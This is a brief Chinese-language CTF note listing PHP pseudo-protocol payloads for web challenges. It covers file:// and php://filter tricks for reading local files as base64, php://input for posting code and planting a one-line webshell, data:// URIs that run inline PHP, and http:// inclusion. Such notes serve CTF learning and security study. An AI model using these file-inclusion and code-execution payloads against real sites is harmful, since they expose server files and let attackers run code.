ctf比赛中经常会出现例用伪协议的web类题目,近期在进行rce刚好总结一下。
flie://
用来访问本地的文件,只能传入绝对路径(一步到底的文件)
?file=file://
?flie=./phpinfo.txt
php://
php://filter
?cmd=php://filter/read=convert.base64-encode/resource=[文件名]
将内容代码以base64输出
php://input
构造之后用post直接传输代码即可,例用hackerbar或者Burpsuit
有权限可以写入一句话木马
data://
?file=data://text/plain,<?php phpinfo();?>
data:text/plain;base64,代码的base64内容(注意+=需要受用转换)
http://&https://
?file=http://127.0.0.1/phpinfo.txt